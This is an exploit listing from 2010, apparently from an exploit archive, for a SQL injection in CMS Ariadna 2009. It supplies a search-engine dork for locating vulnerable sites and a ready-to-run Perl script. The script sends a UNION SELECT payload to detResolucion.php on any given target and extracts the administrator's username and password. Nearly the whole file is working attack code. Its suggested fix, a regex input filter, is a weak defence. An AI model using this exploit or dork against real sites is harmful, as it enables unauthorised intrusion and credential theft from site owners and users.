48 lines
No EOL
1.7 KiB
Text
48 lines
No EOL
1.7 KiB
Text
# Exploit Title : CMS Ariadna 2009 SQL Injection
|
|
# Date : 2010-04-19
|
|
# Author : Andrés Gómez
|
|
# Contact : gomezandres@adinet.com.uy
|
|
# Dork : "allinurl: detResolucion.php?tipodoc_id="
|
|
########################################################################
|
|
Exploit in Perl Start In Next Line:
|
|
|
|
use LWP::Simple;
|
|
|
|
########################################################################
|
|
# Malicious users may inject SQL querys into a vulnerable
|
|
# application to fool a user in order to gather data from them or see
|
|
sensible information.
|
|
########################################################################
|
|
# Solution:
|
|
# $_GET = preg_replace("|([^\w\s\'])|i",'',$_GET);
|
|
# $_POST = preg_replace("|([^\w\s\'])|i",'',$_POST);
|
|
########################################################################
|
|
# Special Thanks : HYPERNETHOST & Security-Pentest & Mauro Rossi
|
|
##########################[Andrés Gómez]#################################
|
|
|
|
my $target = $ARGV[0];
|
|
unless ($target) { print "\n Inyector Remoto -- HYPERNETHOST &
|
|
Security-Pentest -- Andres Gomez\n\n";
|
|
print "\ Dork: allinurl: detResolucion.php?tipodoc_id=\n";
|
|
print "\nEjemplo Ejecucion = AriadnaCms.pl
|
|
http://www.sitio.extension/path/\n" ; exit 1; }
|
|
|
|
$sql =
|
|
"detResolucion.php?tipodoc_id=33+and+1=0+union+select+concat(0x7365637572697479,adm_nombre,0x3a,0x70656e74657374,adm_clave)+from+administrador--";
|
|
|
|
$final = $target.$sql;
|
|
$contenido = get($final);
|
|
|
|
print "\n\n[+] Pagina Web: $target\n\n";
|
|
if ($contenido =~/security(.*):pentest(.*)/) {
|
|
print "[-] Datos extraidos con exito:\n\n";
|
|
print "[+] Usuario = $1\n";
|
|
print "[+] Password = $2\n";
|
|
} else {
|
|
print "[-] No se obtuvieron datos\n\n";
|
|
exit 1;
|
|
}
|
|
|
|
print "\n[ñ] Escriba exit para salir de la aplicacion\n";
|
|
|
|
exit 1; |